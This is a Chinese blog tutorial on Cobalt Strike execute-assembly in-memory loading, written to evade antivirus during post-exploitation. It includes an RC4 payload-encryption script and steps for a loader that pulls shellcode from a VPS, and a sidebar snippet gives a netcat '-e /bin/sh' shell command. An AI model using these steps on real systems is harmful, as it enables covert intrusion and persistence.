cobaltstrike之execute-assembly内存加载—后渗透利用

已于 2024-09-24 16:52:11 修改
阅读量410 收藏 4
点赞数 5
分类专栏: 后渗透 工具 文章标签: windows 网络安全 安全 c#
于 2024-09-24 16:35:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bring_coco/article/details/142492635
版权

通过execute-assembly内存加载来执行文件,从而避免后渗透中被杀毒软件静态报毒,使更多的工具能够继续利用,常见的方式有权限维持,代理上线等操作

远程bin文件加载

首先尝试远程加载bin文件
使用项目https://github.com/shanekhantaun9/SharpLoader
在vps上传一个
在这里插入图片描述
这个文件生成方法,使用rc4.py脚本进行加密

import sys


def rc4(data, key):
    keylen = len(key)
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % keylen]) % 256
        s[i], s[j] = s[j], s[i]

    i = 0
    j = 0
    encrypted = bytearray()
    for n in range(len(data)):
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        encrypted.append(data[n] ^ s[(s[i] + s[j]) % 256])

    return encrypted


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Usage: ./rc4.py <key> <filename>")
        exit(0)

    key = sys.argv[1]
    filename = sys.argv[2]

    with open(filename, 'rb') as f:
        data = f.read()

    encrypted = rc4(data, key.encode())

    with open(f"{filename}.enc", 'wb') as f:
        f.write(encrypted)

    print(f"Written {filename}.enc")

在这里插入图片描述
那么执行如下
在这里插入图片描述
可以看到成功上线

在cs上execute-assembly试试
在这里插入图片描述
可以看到说不是.NET程序,但是它确实是,说明.NET版本问题,那么我用之前《dotnet4.0编译问题》进行编译
再次尝试在这里插入图片描述
在这里插入图片描述
可以看到成功运行并上线,可以看到上线的进程是svchost.exe

远程c#程序(exe)加载

但是实际操作过程中发现有问题,因为对于exe的文件没办法远程加载
那么我又找到一个项目https://github.com/S3cur3Th1sSh1t/Invoke-SharpLoader
需要先加密,看看能不能成功上线
在这里插入图片描述
然后放到vps上的可访问目录
在这里插入图片描述
在这里插入图片描述

那么接下来把powershell的代码写成c#的加载器,目的是为了直接execute-assmbly使用远程加载
完整代码放在https://github.com/qieziwa/Invoke-SharpLoader_dotnet
用dotnet4.0编译即可
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
可以看到成功导出,那么之后再其功能上扩展就可以了

正式来体验下效果,用cs上的
在这里插入图片描述
成功导出

使用场景后渗透代理上线,可内存加载一个远程加载程序(该程序调用远端shellcode)
在这里插入图片描述

即可代理上线

还可以扩展一些c#的功能来更方便后渗透
项目代码:https://github.com/qieziwa/Invoke-SharpLoader_dotnet

番茄酱料
关注
专栏目录
红队专题-Cobalt strike 4.x - Beacon重构
aming小老弟
10-10 619
exit、cd、pwd、file_browse、ps、kill、getuid、mkdir、rm、cp、mv、run、execute、drives、powershell-import、powershell命令混淆、免杀bypassuac(uac-to。sleep、shell、upload、download、exit、cd、pwd、file_browse、ps、kill、getuid、mkdir、rm、cp、mv、自删除、timestomp。命令的执行对应cs中的shell、run、execute三个命令。
148.网络安全渗透测试—[Cobalt Strike系列]—[HTTP Beacon基础使用/脚本web传递/屏幕截图/端口扫描]
qwsn
03-19 3399
一、Cobalt Strike基本使用 1、Cobalt Strike简介 2、Cobalt Strike(CS)整体框架图 二、Cobalt Strike简单使用 1、实验坏境 2、实验过程
内网渗透神器CobaltStrikeexecute-assembly(十三)
xf555er的博客
08-21 1143
"execute-assembly"是Cobalt Strike的一项功能,它允许你在Cobalt Strike的Beacon控制的目标机器上直接执行.NET程序集(Assembly)。具体来说,这个功能通过在目标机器的内存加载.NET程序集并执行它,而不需要将程序集写入到磁盘。这种在内存中执行程序的方法也被称为"文件无(fileless)"攻击,因为它能避免在磁盘上留下可疑的文件,从而绕过某些基于文件扫描的防御手段。
Cobalt Strike 4.0-渗透攻击-First day
qq_34801745的博客
10-30 4693
** Cobalt Strike 4.0-渗透攻击-First day(dayu) ** 作者:大余 时间:2020-10-30 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 我必须再重申一遍:务必不要做未授权测试!不要未经授权在真实网络环境中复现任何文章中描述的攻击。即使是出于好奇而不是恶意,你仍然会因未授权测试行为而陷入很多麻烦。为了个人能
CobaltStrike4.8汉化版带插件
siu~
09-16 1万+
CobaltStrike4.8汉化版带插件安装及使用教程
渗透模拟之Cobalt Strike(附CS4.0中文版)
dl1286670932的博客
11-18 2300
Cobalt Strike(简称CS)是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后渗透行动,分为服务器和客户端。
CobaltStrike从入门到精通系列视频教程(五)后渗透攻击
风炫的博客
03-11 408
0X001 基础介绍 • Access 子菜单包含对凭据的操作和提权在内的一些选项。 • Explore 子菜单包含信息探测和与目标系统交互的一些选项。 • Pivoting 子菜单你可以通过一个 Beacon 来配置工具来搭建流量隧道。 • Session 菜单你可以管理当前 Beacon 会话。 beacon讲解 Command Description ------- ----------- browserpivo
Cobalt Strike使用教程——基础篇
Captain_RB的博客
06-10 2万+
本文主要介绍 **Cobalt Strike** 4.3 的基本功能及使用方法
Cobalt Strike 4.0渗透攻击工具
tlovejr的博客
03-30 4631
前言 前几天在做综合靶场的时候,有一个不太完整的vulntarget-a综合靶场,在这里我用了cs工具那么今天就给大家简单的说一下这个工具 1、工具简介 Cobalt Strike是一款以metasploit为基础的GUI的框架式渗透工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,winexe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等。 Cobalt Strike主要用于团队作战,可
Cobalt Strike使用教程一
热门推荐
迷风小白
10-24 7万+
0x00 简介 Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透Cobalt Strike集...
【CS学习笔记】10、如何管理Payload载荷
TeamsSix 的 CSDN 空间
06-27 1007
0x00 前言 到目前为止,已经学过了如何在有漏洞的目标上获取立足点的方法,接下来将继续学习后渗透相关的知识,这一节就来学习学习 beacon 的管理、会话传递等。 0x01 Beacon 的管理 Beacon 控制台 在一个 Beacon 会话上右击 interact(交互)即可打开 Beacon 控制台,如果想对多个会话进行控制,也只需选中多个会话,执行相关功能即可。 在 Beacon 的控制台中的输入与输出之间,是一个状态栏,状态栏上的信息分别是:目标 NetBIOS 名称、用户名、会话PID以及
红队专题-Cobalt strike从小白到飞升手册
最新发布
aming小老弟
10-09 1376
4.0 2019年12月2日 更新 Cobalt Strike 4.0 手册奇安信 A-TEAMCobalt Strike 是一款 美国Red Team开发的 商业GUI框架式 优秀的渗透测试工具 简称CS为对手模拟渗透测试 和红队行动而设计的 协作工具平台,主要用于执行有目标的攻击和模拟高级威胁者的后渗透行动。可以利用网络漏洞获取主机权限后、从一个强大的图形界面控制所有的活动。因可以调用Mimikatz等其他知名工具并且可以作为团队服务使用,因此广受网络安全人员喜爱。
内网神器cobaltstrike使用教程
hackzkaq的博客
11-17 7913
搜索公众号:白帽子左一,领配套练手靶场,全套安全课程及工具 一、安装使用 安装 系统环境:需要java环境Oracle Java 1.8,Oracle Java 11 下载解压就可以使用 使用 首先要运行服务端,如果你有个外网的机器,可以把服务端运行于外网的机器上,也可以运行于本地 服务端启动命令 windows 运行teamserver.bat teamserver.bat 1.1.1.1 123456 linux 需要有足够权限,可以通过chmod +x teamserver 来提高权限 ./tea
Certutil工具(Windows命令行下载常用)
bring_coco的博客
05-28 3万+
Certutil包含一个编码参数(编码)。这有助于在Base64中编码文件的内容。这是在Windows中等效于Linux中的base64命令。不能打开.exe可执行文件时候,可以使用certutil对可执行文件进行编码。然后传输编码后的数据,然后在接收机上对其进行解码。这里创建一个名为test.txt的文本文件,输入一些内容,打开powershell命令:Add-Content test.txt “ni hao”编码(base64)
冰蝎使用
bring_coco的博客
03-03 1万+
一.启动 Windows环境下: 1.配置环境:冰蝎只支持jre6-jre8 可以在电脑上查看java版本 命令:java -version 2.启动 在冰蝎目录下命令行输入 命令:java -jar Behinder_v3.0_Beta6_win.jar(这里文件名可简化) 即可开启 Linux环境下: 注意切换jdk版本6-8,对应javac版本也要和java版本相同,同理打开冰蝎目录输入命令 二.使用(在本机进行实测) 环境:phpStudy+冰蝎 通过启动phpStudy,访问本机地址 成功访
Sqlmap的getshell使用(--os-shell)
bring_coco的博客
03-16 9907
环境:sqli-lab靶场+phpstudy。
FOFA语法
bring_coco的博客
03-07 6947
1.title=”beijing” 从标题中搜索“北京” 2.header=”thinkphp” 从http响应头中搜索“thinkphp” 3.body=”管理后台” 从html正文中搜索“管理后台” 4.domain=”163.com” 从子域名中搜索带有“163.com”的网站 5.icon_hash=”-247388890” 搜索使用此icon的资产 6.host=”.gov.cn”
哥斯拉Webshell
bring_coco的博客
03-03 5624
一.启动 命令:java -jar Godzilla-V2.96.jar 启动时同目录会生成data.db数据库存放数据 启动成功界面如下 二.使用(在本机实测) 这里演示jsp文件进行连接(需要提前配置好jsp环境) 1.点击管理->生成 这里默认密码,密钥(也可以更改,只要跟连接时候保持一致即可) 接下来将生成的文件存放在Tomcat目录下,注意是在Tomcat–>webapps–>ROOT目录下 可以打开指定路径,此时生成的shell.jsp已经生成 接下来点击目标—&
内网中使用netcat进行正向和反向获取shell
bring_coco的博客
12-07 3386
本次演示在linux环境下 一般用外网机器对内网机器进行访问时,多用反向shell,内网机器与内网机器之间多用正向shell 正向shell 由于内网及其属于边界服务器,因此我们先进行正向shell演示(正向shell是在目标机器上进行监听): 内网机器上命令:nc -lvp 4444 -e /bin/sh 本地机器上命令:nc 10.0.78.41 4444 显示已经连接 进行验证: 说明正向连接成功 反向shell 反向shell是在本地vps上进行监听,目标机器进行连接 本地机器上命令:nc -l
obsidian插件execute-code
05-18
Obsidian插件execute-code是一个非常有用的插件,它允许用户在Obsidian中执行代码,并将结果直接显示在文档中。这个插件支持多种编程语言,包括JavaScript、Python、Ruby、Go等等。 使用execute-code插件,你可以: - 在Obsidian中运行代码片段,无需离开应用程序。 - 将代码结果直接嵌入文档中,方便查看和分享。 - 利用代码来自动生成文本,例如生成随机密码、自动生成摘要等等。 要使用execute-code插件,你需要: 1. 安装插件:在Obsidian的设置中,点击“插件”选项卡,在搜索栏中输入“execute-code”,点击“安装”按钮即可。 2. 编写代码段:在文档中编写你的代码段,例如: ```python import random print(random.randint(1,10)) ``` 3. 运行代码段:选中代码段,右键点击鼠标,在弹出的菜单中选择“Execute Code”即可运行代码。 4. 查看结果:执行完成后,你会看到代码运行结果直接嵌入在文档中。 注意:使用execute-code插件时,请务必注意代码的安全性,确保代码来源可靠,以免产生安全问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值